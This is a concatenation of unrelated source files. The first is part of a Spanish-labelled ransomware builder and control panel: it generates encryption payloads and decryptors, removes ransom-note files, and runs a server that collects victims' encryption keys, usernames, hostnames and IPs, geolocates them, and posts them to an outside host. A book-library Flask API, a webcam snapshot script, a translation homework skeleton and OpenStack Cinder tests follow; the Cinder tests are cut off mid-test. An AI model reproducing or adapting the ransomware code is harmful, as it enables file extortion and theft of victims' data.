self.options['new_target_ext']['yscrollcommand'] = scrollb.set
save = Button(self.extentions, text = 'SAVE', command = self.change_target_ext, width = 15).grid(row = 1, column = 0)
self.options['new_target_ext'].insert(END, self.options['target_ext'].get())
self.options['new_target_ext'].focus()
def change_target_ext(self):
self.options['target_ext'].set(self.options['new_target_ext'].get('1.0', END))
self.extentions.destroy()
def set_dirs(self):
self.dirs = Toplevel()
self.dirs.title(string = 'Definir Directorios')
self.dirs.configure(background = 'white')
self.dirs.resizable(0,0)
self.dirs.bind("<Escape>", self.close_set_target_dirs)
Label(self.dirs, text = 'Root', background = 'white').grid(row = 0, column = 0, sticky = 'w')
self.options['new_working_dir'] = Entry(self.dirs, width = 30)
self.options['new_working_dir'].grid(row = 1, column = 0, sticky = 'n')
Label(self.dirs, text = 'Directorios', background = 'white').grid(row = 2, column = 0, sticky = 'w')
self.options['new_target_dirs'] = Text(self.dirs, height = 10, width = 40)
self.options['new_target_dirs'].grid(row = 3, column = 0)
save = Button(self.dirs, text = 'Guardar', command = self.change_target_dirs, width = 15).grid(row = 4, column = 0)
self.options['new_working_dir'].insert(END, self.options['working_dir'].get())
self.options['new_target_dirs'].insert(END, self.options['target_dirs'].get())
self.options['new_working_dir'].focus()
def change_target_dirs(self):
self.options['working_dir'].set(self.options['new_working_dir'].get())
self.options['target_dirs'].set(self.options['new_target_dirs'].get('1.0', END))
self.dirs.destroy()
def check_settings(self):
if self.options['mode'].get() == 2:
self.options['full_screen_var'].set(0)
def make_demon(self):
try:
create_demon(self.options['host'].get(),
self.options['port'].get(),
self.options['full_screen_var'].get(),
self.options['demo'].get(),
self.options['type'].get(),
self.options['method'].get(),
self.options['msg'].get(),
self.options['img_base64'].get(),
self.options['mode'].get(),
self.options['debug'].get(),
self.options['target_ext'].get(),
self.options['target_dirs'].get(),
self.options['remove_payload'].get(),
self.options['working_dir'].get(),
self.options['runas'].get())
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to generate payload!\n\n%s' % e)
return
try:
create_decrypt(self.options['type'].get())
messagebox.showinfo('SUCCESS', 'Payload y Descifrador generados exitosamente.')
except Exception as e:
messagebox.showwarning('ERROR', 'Failed to generate decryptor!\n\n%s' % e)
self.gen.destroy()
def decrypt_files(self):
ask = confirm(text='Selecciona un Método de Desenciptación', buttons=['PyCrypto', 'PyAES'])
if ask == "I don't know":
messagebox.showinfo('Encryption type detection', 'Coming Soon!\n\nIf you really do not know, test it on one file first.')
return
if ask == 'Ghost':
pass
else:
key = dec_key()
if key == False:
return
key = key.encode('utf-8')
p = dec_path()
if p == False:
return
a = messagebox.askokcancel('ALERTA', 'Esta herramienta descifrará sus archivos con la clave dada.\n\nSin embargo, si su clave o método no es correcto, sus archivos (encriptados) serán dañados\n\n ¡Es posible que desee hacer una copia de seguridad!')
if a == True:
pass
else:
return
try:
counter = 0
for path, subdirs, files in os.walk(p):
for name in files:
if name.endswith(".DEMON"):
if ask == 'PyCrypto':
decrypt_file(os.path.join(path, name), key)
os.remove(os.path.join(path, name))
print("[Decrypted] %s" % name)
counter+=1
elif ask == 'PyAES':
print("[Decrypting] %s" % name)
decrypt_file_pyaes(os.path.join(path, name), key)
os.remove(os.path.join(path, name))
counter+=1
elif ask == 'Ghost':
rename_file(os.path.join(path, name))
print("[RENAMED] %s" % name)
counter+=1
elif name == 'README.txt':
os.remove(os.path.join(path, name))
print('[DELETED] %s/%s' % (path, name))
else:
print("[Skipped] %s" % name)
print("\n[DONE] Decrypted %i files" % counter)
except KeyboardInterrupt:
print("\nInterrupted!\n")
sys.exit(0)
except Exception as e:
print("\n[ ERROR ] %s" % e)
sys.exit(1)
def start_thread(self):
# Start server as thread
thread = threading.Thread(target=self.start_server, daemon = True)
thread.start()
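# start_server() accepts callbacks from payload clients: each client sends one
# '$'-delimited record (local IP $ OS $ key $ username $ hostname), which is logged,
# counted per platform, geolocated via ip-api.com and posted to the remote endpoint.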
def start_server(self):
host = self.options['host'].get()
port = self.options['port'].get()
save_keys = self.options['save_keys'].get()
socket_list = []
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.bind((host, port))
self.server_socket.listen(10)
self.insert_banner()
self.serv.options['log'].insert('1.0', "Servidor Iniciado en [%s] [%s]\nEsperando...\n" % (host, int(port)), 'deeppink')
try:
while True:
sockfd, addr = self.server_socket.accept()
try:
while True:
data = sockfd.recv(1024)
if data:
data = data.decode('UTF-8')
ip = addr[0]
local = data.split('$')[0]
system = data.split('$')[1]
key = data.split('$')[2].strip()[2:].strip()[:-1]
user = data.split('$')[3]
hostname = data.split('$')[4]
if ip:
lookup = self.get_ip_data(ip)
con = lookup.split(',')[0]
country = lookup.split(',')[1]
region = lookup.split(',')[2]
city = lookup.split(',')[3]
isp = lookup.split(',')[4]
zip = lookup.split(',')[5]
lat = lookup.split(',')[6]
lon = lookup.split(',')[7]
result = '''
[Fecha] -> %s %s
[Username] -> %s
[OS] -> %s
[Hostname] -> %s
[Key] -> %s
[IP Remota] -> %s
[IP Local] -> %s
''' % (time.strftime('%d/%m/%Y'),
time.strftime('%X'),
user,
system,
hostname,
key,
ip,
local)
self.serv.options['log'].insert(END, result, 'yellow')
self.serv.options['log'].see(END)
if system == 'Windows':
co = self.serv.options['win']['text'] + 1
self.serv.options['win']['text'] = co
elif system == 'Darwin':
co = self.serv.options['mac']['text'] + 1
self.serv.options['mac']['text'] = co
elif system == 'Linux':
co = self.serv.options['linux']['text'] + 1
self.serv.options['linux']['text'] = co
else:
co = self.serv.options['other']['text'] + 1
self.serv.options['other']['text'] = co
#if save_keys == 1:
payload = {'user' : self.options['username'].get(), 'pwd' : self.options['password'].get(), 'Occured': time.strftime('%d/%m/%Y') + ' ' + time.strftime('%X'), 'Username' : user, 'OS' : system, 'Hostname' : hostname, 'Key' : key, 'IP' : ip, 'LocalIP' : local, 'Continent' : con, 'Country' : country, 'Region' : region, 'City' : city , 'ISP' : isp, 'ZIP' : zip, 'lat' : lat, 'lon' : lon}
r = requests.post('https://zeznzo.nl/post.py', data=payload)
else:
break
except Exception as e:
print(e)
finally:
sockfd.close()
except Exception as e:
pass
self.server_socket.close()
def close_server_by_click(self):
self.server_socket.close()
self.serv.destroy()
def insert_banner(self):
banner = '''
______ ______ _____ __ __ _____ _____ _____ _____
| ___ \| ___ \| _ |\ \ / /| ___|/ __ \|_ _|| _ |
| |_/ /| |_/ /| | | | \ V / | |__ | / \/ | | | | | |
| __/ | / | | | | \ / | __| | | | | | | | |
| | | |\ \ \ \_/ / | | | |___ | \__/\ | | \ \_/ /
\_| \_| \_| \___/ \_/ \____/ \____/ \_/ \___/
______ __ __ _____ _ _ _____ _ _
| ___ \\ \ / /|_ _|| | | || _ || \ | |
| |_/ / \ V / | | | |_| || | | || \| |
| __/ \ / | | | _ || | | || . ` |
| | | | | | | | | |\ \_/ /| |\ |
\_| \_/ \_/ \_| |_/ \___/ \_| \_/
'''
self.serv.options['log'].insert('1.0', banner + '\n', 'red')
def get_ip_data(self, ip):
url = 'http://ip-api.com/json/%s?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,currency,isp,org,as,asname,reverse,mobile,proxy,query' % ip
try:
r = requests.get(url, timeout = 5)
except Exception as e:
con = 'Error - Fail'
country = 'Error - Fail'
region = 'Error - Fail'
city = 'Error - Fail'
isp = 'Error - Fail'
zip = 'Error - Fail'
lat = 'Error - Fail'
lon = 'Error - Fail'
return '%s,%s,%s,%s,%s,%s,%s,%s' % (con, country, region, city, isp, zip, lat, lon)
data = r.json()
if r.status_code == 200 and data['status'] == 'success':
con = data['continent'] + ' (' + data['continentCode'] + ')'
country = data['country'] + ' (' + data['countryCode'] + ')'
region = data['regionName']
city = data['city']
isp = data['isp'].replace(',', '')
zip = data['zip']
lat = data['lat']
lon = data['lon']
else:
con = 'Error - Fail'
country = 'Error - Fail'
region = 'Error - Fail'
city = 'Error - Fail'
isp = 'Error - Fail'
zip = 'Error - Fail'
lat = 'Error - Fail'
lon = 'Error - Fail'
return '%s,%s,%s,%s,%s,%s,%s,%s' % (con, country, region, city, isp, zip, lat, lon)
def close_profile(self, event):
self.prof.destroy()
def close_exploit(self, event):
self.exp.destroy()
def close_server(self, event):
self.server_socket.close()
self.serv.destroy()
def close_compile(self, event):
self.comp.destroy()
def close_generate(self, event):
self.gen.destroy()
def close_set_msg(self, event):
self.message.destroy()
def close_set_target_ext(self, event):
self.extentions.destroy()
def close_set_target_dirs(self, event):
self.dirs.destroy()
def exit(self):
sys.exit(0)
def exit_event(self, event):
exit(0)
ventana = MainWindow()
ventana.mainloop()
``` |
{
"source": "2020-Fall-UIUC-LING506/hw2",
"score": 3
} |
#### File: 2020-Fall-UIUC-LING506/hw2/align.py
```python
import argparse
from collections import defaultdict
import sys
from corpus import AlignmentScores, ParallelCorpus
import signal
import pathlib
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def parse_align_flags() -> argparse.Namespace:
"""Parse command line arguments"""
parser = argparse.ArgumentParser(description='Calculate word alignments from a sentence-aligned parallel corpus')
parser.add_argument("-f", "--f_file",
type=str,
default=f"{pathlib.Path(__file__).parent.absolute()}/data/hansards.f",
help="Path to sentence-aligned French side of the parallel corpus")
parser.add_argument("-e", "--e_file",
type=str,
default=f"{pathlib.Path(__file__).parent.absolute()}/data/hansards.e",
help="Path to sentence-aligned English side of the parallel corpus")
parser.add_argument("-n", "--num_sentences",
type=int,
default=None,
help="Optional limit on the number of sentence pairs read from the corpus")
return parser.parse_args()
def train(corpus: ParallelCorpus) -> AlignmentScores:
# Initialize all alignment scores to zero
alignment_score: AlignmentScores = defaultdict(float)
# Your code to calculate word alignment scores goes here.
#
# You are expected to implement IBM Model 1
return alignment_score
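# Illustrative sketch only (not part of the original skeleton): one way to fill in
# train() above with the classic IBM Model 1 EM loop. It assumes -- which this file
# does not guarantee -- that iterating a ParallelCorpus yields sentence pairs with
# `.f` and `.e` token lists (as print_alignments() below suggests) and that
# AlignmentScores maps (f_word, e_word) tuples to floats.
def _example_ibm_model1_em(corpus: ParallelCorpus, iterations: int = 5) -> AlignmentScores:
    # t(f|e): translation scores, initialised to a uniform constant
    t: AlignmentScores = defaultdict(lambda: 1.0)
    for _ in range(iterations):
        count = defaultdict(float)   # expected counts c(f, e)
        total = defaultdict(float)   # normaliser per English word
        for pair in corpus:
            for f_word in pair.f:
                # mass of aligning f_word to any e_word in this sentence pair
                z = sum(t[(f_word, e_word)] for e_word in pair.e)
                for e_word in pair.e:
                    delta = t[(f_word, e_word)] / z
                    count[(f_word, e_word)] += delta
                    total[e_word] += delta
        # M-step: re-estimate t(f|e) from the expected counts
        for (f_word, e_word), c in count.items():
            t[(f_word, e_word)] = c / total[e_word]
    return t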
def print_alignments(corpus: ParallelCorpus, alignment_score: AlignmentScores):
"""Print alignments for each parallel sentence"""
for parallel_sentence in corpus:
for (i, f_word) in enumerate(parallel_sentence.f):
for (j, e_word) in enumerate(parallel_sentence.e):
# Your code goes here
pass
if __name__ == "__main__":
# Parse command line arguments
flags = parse_align_flags()
# Construct parallel corpus from user-specified files
parallel_corpus = ParallelCorpus(flags.f_file, flags.e_file, flags.num_sentences)
# Calculate alignment scores using naive baseline algorithm
baseline_alignment_scores: AlignmentScores = train(parallel_corpus)
# Print alignments
print_alignments(parallel_corpus, baseline_alignment_scores)
``` |
{
"source": "2020gupta/automation",
"score": 3
} |
#### File: 2020gupta/automation/take_snapshot.py
```python
import cv2
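# Captures a single frame from the default camera (device 0) and writes it to
# NewPicture1.jpg in the working directory.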
def take_snapshot():
videoCaptureObject = cv2.VideoCapture(0)
result = True
while(result):
ret,frame = videoCaptureObject.read()
cv2.imwrite("NewPicture1.jpg",frame)
result = False
videoCaptureObject.release()
cv2.destroyAllWindows()
take_snapshot()
``` |
{
"source": "2020HackDiversity-Team12/cscl-api",
"score": 3
} |
#### File: cscl-api/src/main.py
```python
import database
import config
import resources
from flask import Flask, Blueprint, make_response, jsonify
from werkzeug import exceptions as w_exceptions
app = Flask(__name__)
app.config.from_object(config.ProdConfig)
app.register_blueprint(resources.books)
database.init(app)
############################
# CORS #
############################
@app.after_request
def add_headers(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Methods',
'GET, POST, PUT, DELETE')
response.headers.add('Access-Control-Allow-Headers',
'x-requested-with,Content-Type')
response.headers.add('Access-Control-Expose-Headers',
'Content-Type,Content-Length')
return response
############################
# HTTP ERROR HANDLER #
############################
@app.errorhandler(w_exceptions.BadRequest)
def bad_request(err):
resp = jsonify({'status': err.code, 'text': 'bad request'})
return make_response(resp, err.code)
@app.errorhandler(w_exceptions.NotFound)
def not_found(err):
resp = jsonify({'status': err.code, 'text': 'resource not found'})
return make_response(resp, err.code)
@app.errorhandler(w_exceptions.MethodNotAllowed)
def method_not_allowed(err):
resp = jsonify({'status': err.code, 'text': 'method not allowed'})
return make_response(resp, err.code)
if __name__ == "__main__":
app.run()
```
#### File: cscl-api/src/resources.py
```python
from flask import Blueprint, abort, jsonify, request, Response
from database.models import Book
import helpers
import service
import re
books = Blueprint('books', __name__)
HOST = 'https://api-cscl.herokuapp.com'
# ######################
# BOOK ENDPOINTS #
# ######################
@books.route('/api/search', methods=['GET'])
def search():
"""
Retrieve `SIZE_LIMIT` book records based on `q` param
-----------------------------------------------------
Endpoints:
GET /search?q={book_isbn_or_book_title}
@QueryParams:
q: (required) query
@Response:
books: return `SIZE_LIMIT` books that match the query
next: url to list the next `SIZE_LIMIT` book records
"""
try:
q = request.args.get("q")
regex = re.compile(f'.*{q}.*')
book = Book.objects(title=regex).limit(30)
return jsonify(book)
except:
return jsonify({"Error": "Bad query"})
@books.route('/api/books', methods=['GET'])
def get_books():
"""
Retrieve `SIZE_LIMIT` available book records
-------------------------------------------
Endpoints:
GET /books
GET /books?lastid={last_book_id}
@QueryParams:
lastid: (optional) last book id to implement forward paging system
@Response:
books: return `SIZE_LIMIT` books
next: url to list the next `SIZE_LIMIT` book records
"""
books = None
book_lastid = None
param_lastid = request.args.get("lastid")
if(param_lastid):
books = Book.objects(id__lt=param_lastid).order_by("-_id").limit(30)
else:
books = Book.objects().order_by("-_id").limit(30)
try:
book_lastid = books[len(books) - 1].id
except Exception:
pass
next = f'{HOST}/api/books?lastid={book_lastid}' if book_lastid else None
return jsonify({'books': books, 'next': next})
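# Example of the paging contract above (ids are hypothetical):
#   GET /api/books                      -> 30 newest books + next=".../api/books?lastid=<id of 30th>"
#   GET /api/books?lastid=<id of 30th>  -> the next 30 older records, until `next` is None.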
# Validate books that are created by client (Should we require the images??????)
def ValidateBook(bookObject):
if ("isbn" in bookObject and "title" in bookObject and "author" in bookObject and
"publisher" in bookObject and "publication_year" in bookObject and "copies" in bookObject):
return True
else:
return False
@books.route('/api/books', methods=['POST'])
def create_book():
"""
Create a book record
--------------------
Endpoints:
POST /books
@BodyParams:
isbn: int
title: str
author: str
publisher: str
publication_year: str
copies: int
@Response:
200: return book ID
"""
entry = request.get_json()
if ValidateBook(entry):
newBook = {
"isbn": entry["isbn"],
"title": entry["title"],
"author": entry["author"],
"publisher": entry["publisher"],
"publication_year": entry["publication_year"],
"copies": entry["copies"],
# "image_url_s": entry["image_url_s"],
# "image_url_m": entry["image_url_m"],
# "image_url_l": entry["image_url_l"]
}
newBook["available"] = newBook["copies"]
Book(**newBook).save()
return jsonify(newBook)
else:
return "Invalid Entry"
@books.route('/api/books/<string:isbn>', methods=['GET'])
def get_book(isbn):
"""
Retrieve a specific book record by its ISBN
---------------------------------------------
Endpoints:
GET /books/isbn
GET /books/isbn?act=(borrow|handback)
@QueryParams:
act: (optional) specific action on book
Possible values: borrow, handback
@Response:
200: return book record
"""
try:
book = Book.objects.get(isbn=isbn)
if request.args.get("act") == "borrow":
if book["available"] > 0:
book["available"] -= 1
else:
return "This book is unavailable"
elif request.args.get("act") == "handback":
if book["available"] < book["copies"]:
book["available"] += 1
else:
return "You can't adda new copy"
book.save()
return jsonify(book)
except:
return "We don't carry this book"
@books.route('/api/books/<string:isbn>', methods=['PUT'])
def update_book(isbn):
"""
Update a specific book record by its ISBN
------------------------------------------
Endpoints:
PUT /books/isbn
@BodyParams:
isbn: int
title: str
author: str
publisher: str
publication_year: str
copies: int
available: int
image_url_s: url
image_url_m: url
image_url_l: url
@Response:
200: return book id
"""
entry = request.get_json()
try:
Book.objects.get(isbn=isbn).update(**entry)
b = Book.objects.get(isbn=isbn)
return jsonify(b)
except:
return jsonify({"Error": "Invalid Isbn or Invalid request"})
@books.route('/api/books/<string:isbn>', methods=['DELETE'])
def remove_book(isbn):
"""
Delete a specific book record by its ISBN
------------------------------------------
Endpoints:
DELETE /books/isbn
@Response:
200: return book id
"""
try:
book = Book.objects.get(isbn=isbn)
isbn = book.isbn
book.delete()
return jsonify({'success': True, 'isbn': isbn})
except:
return jsonify({"Error": "Invalid isbn"})
return "Book Has been deleted"
@books.route('/api/seed/<int:n>', methods=['GET'])
def seed_database(n):
"""
POPULATE DB WITH FAKE DATA
------------------------------------------
Endpoints:
GET /seed/{n}
@Response:
200: BOOKS CREATED
"""
message = None
try:
books = helpers.fake_book(int(n))
[service.create(book) for book in books]
message = 'books created'
except Exception:
message = 'error while populating db'
finally:
return message
``` |
{
"source": "2020human/cinder",
"score": 2
} |
#### File: api/contrib/test_snapshot_actions.py
```python
import mock
from oslo_serialization import jsonutils
import webob
from cinder import context
from cinder import db
from cinder.objects import fields
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit.api.v2 import fakes as v2_fakes
from cinder.tests.unit import fake_constants as fake
def fake_snapshot_get(context, snapshot_id):
snapshot = v2_fakes.fake_snapshot(snapshot_id)
if snapshot_id == fake.SNAPSHOT_ID:
snapshot['status'] = fields.SnapshotStatus.CREATING
else:
snapshot['status'] = fields.SnapshotStatus.ERROR
return snapshot
class SnapshotActionsTest(test.TestCase):
def setUp(self):
super(SnapshotActionsTest, self).setUp()
self.user_ctxt = context.RequestContext(
fake.USER_ID, fake.PROJECT_ID, auth_token=True)
@mock.patch('cinder.db.snapshot_update', autospec=True)
@mock.patch('cinder.db.sqlalchemy.api._snapshot_get',
side_effect=fake_snapshot_get)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_update_snapshot_status(self, metadata_get, *args):
body = {'os-update_snapshot_status':
{'status': fields.SnapshotStatus.AVAILABLE}}
req = webob.Request.blank('/v2/%s/snapshots/%s/action' % (
fake.PROJECT_ID, fake.SNAPSHOT_ID))
req.method = "POST"
req.body = jsonutils.dump_as_bytes(body)
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
self.assertEqual(202, res.status_int)
@mock.patch('cinder.db.sqlalchemy.api._snapshot_get',
side_effect=fake_snapshot_get)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_update_snapshot_status_invalid_status(self, metadata_get, *args):
body = {'os-update_snapshot_status': {'status': 'in-use'}}
req = webob.Request.blank('/v2/%s/snapshots/%s/action' % (
fake.PROJECT_ID, fake.SNAPSHOT_ID))
req.method = "POST"
req.body = jsonutils.dump_as_bytes(body)
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
self.assertEqual(400, res.status_int)
def test_update_snapshot_status_without_status(self):
self.mock_object(db, 'snapshot_get', fake_snapshot_get)
body = {'os-update_snapshot_status': {}}
req = webob.Request.blank('/v2/%s/snapshots/%s/action' % (
fake.PROJECT_ID, fake.SNAPSHOT_ID))
req.method = "POST"
req.body = jsonutils.dump_as_bytes(body)
req.headers["content-type"] = "application/json"
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
self.assertEqual(400, res.status_int)
```
#### File: api/v3/test_group_snapshots.py
```python
import ddt
import mock
import webob
from cinder.api.v3 import group_snapshots as v3_group_snapshots
from cinder import context
from cinder import db
from cinder import exception
from cinder.group import api as group_api
from cinder import objects
from cinder.objects import fields
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import utils
import cinder.volume
GROUP_MICRO_VERSION = '3.14'
@ddt.ddt
class GroupSnapshotsAPITestCase(test.TestCase):
"""Test Case for group_snapshots API."""
def setUp(self):
super(GroupSnapshotsAPITestCase, self).setUp()
self.controller = v3_group_snapshots.GroupSnapshotsController()
self.volume_api = cinder.volume.API()
self.context = context.get_admin_context()
self.context.project_id = fake.PROJECT_ID
self.context.user_id = fake.USER_ID
self.user_ctxt = context.RequestContext(
fake.USER_ID, fake.PROJECT_ID, auth_token=True)
def test_show_group_snapshot(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context, group_id=group.id)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
version=GROUP_MICRO_VERSION)
res_dict = self.controller.show(req, group_snapshot.id)
self.assertEqual(1, len(res_dict))
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshot']['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshot']['name'])
self.assertEqual('creating', res_dict['group_snapshot']['status'])
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
def test_show_group_snapshot_with_group_snapshot_NotFound(self):
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID,
fake.WILL_NOT_BE_FOUND_ID),
version=GROUP_MICRO_VERSION)
self.assertRaises(exception.GroupSnapshotNotFound,
self.controller.show,
req, fake.WILL_NOT_BE_FOUND_ID)
def test_list_group_snapshots_json(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot1 = utils.create_group_snapshot(
self.context, group_id=group.id,
group_type_id=group.group_type_id)
group_snapshot2 = utils.create_group_snapshot(
self.context, group_id=group.id,
group_type_id=group.group_type_id)
group_snapshot3 = utils.create_group_snapshot(
self.context, group_id=group.id,
group_type_id=group.group_type_id)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
res_dict = self.controller.index(req)
self.assertEqual(1, len(res_dict))
self.assertEqual(group_snapshot1.id,
res_dict['group_snapshots'][0]['id'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][0]['name'])
self.assertEqual(group_snapshot2.id,
res_dict['group_snapshots'][1]['id'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][1]['name'])
self.assertEqual(group_snapshot3.id,
res_dict['group_snapshots'][2]['id'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][2]['name'])
group_snapshot3.destroy()
group_snapshot2.destroy()
group_snapshot1.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
def test_list_group_snapshots_detail_json(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot1 = utils.create_group_snapshot(
self.context, group_id=group.id)
group_snapshot2 = utils.create_group_snapshot(
self.context, group_id=group.id)
group_snapshot3 = utils.create_group_snapshot(
self.context, group_id=group.id)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/detail' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
res_dict = self.controller.detail(req)
self.assertEqual(1, len(res_dict))
self.assertEqual(3, len(res_dict['group_snapshots']))
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshots'][0]['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][0]['name'])
self.assertEqual(group_snapshot1.id,
res_dict['group_snapshots'][0]['id'])
self.assertEqual('creating',
res_dict['group_snapshots'][0]['status'])
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshots'][1]['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][1]['name'])
self.assertEqual(group_snapshot2.id,
res_dict['group_snapshots'][1]['id'])
self.assertEqual('creating',
res_dict['group_snapshots'][1]['status'])
self.assertEqual('this is a test group snapshot',
res_dict['group_snapshots'][2]['description'])
self.assertEqual('test_group_snapshot',
res_dict['group_snapshots'][2]['name'])
self.assertEqual(group_snapshot3.id,
res_dict['group_snapshots'][2]['id'])
self.assertEqual('creating',
res_dict['group_snapshots'][2]['status'])
group_snapshot3.destroy()
group_snapshot2.destroy()
group_snapshot1.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
@mock.patch('cinder.db.volume_type_get')
@mock.patch('cinder.quota.VolumeTypeQuotaEngine.reserve')
def test_create_group_snapshot_json(self, mock_quota, mock_vol_type,
mock_validate):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
res_dict = self.controller.create(req, body)
self.assertEqual(1, len(res_dict))
self.assertIn('id', res_dict['group_snapshot'])
self.assertTrue(mock_validate.called)
group.destroy()
group_snapshot = objects.GroupSnapshot.get_by_id(
context.get_admin_context(), res_dict['group_snapshot']['id'])
db.volume_destroy(context.get_admin_context(),
volume_id)
group_snapshot.destroy()
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
@mock.patch('cinder.db.volume_type_get')
def test_create_group_snapshot_when_volume_in_error_status(
self, mock_vol_type, mock_validate):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
status='error',
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, body)
self.assertTrue(mock_validate.called)
group.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
def test_create_group_snapshot_with_no_body(self):
# omit body from the request
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, None)
@mock.patch.object(group_api.API, 'create_group_snapshot',
side_effect=exception.InvalidGroupSnapshot(
reason='Invalid group snapshot'))
def test_create_with_invalid_group_snapshot(self, mock_create_group_snap):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
status='error',
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, body)
group.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
@mock.patch.object(group_api.API, 'create_group_snapshot',
side_effect=exception.GroupSnapshotNotFound(
group_snapshot_id='invalid_id'))
def test_create_with_group_snapshot_not_found(self, mock_create_grp_snap):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
status='error',
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(exception.GroupSnapshotNotFound,
self.controller.create,
req, body)
group.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
def test_create_group_snapshot_from_empty_group(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
body = {"group_snapshot": {"name": "group_snapshot1",
"description":
"Group Snapshot 1",
"group_id": group.id}}
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots' %
fake.PROJECT_ID,
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, body)
group.destroy()
def test_delete_group_snapshot_available(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status='available')
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
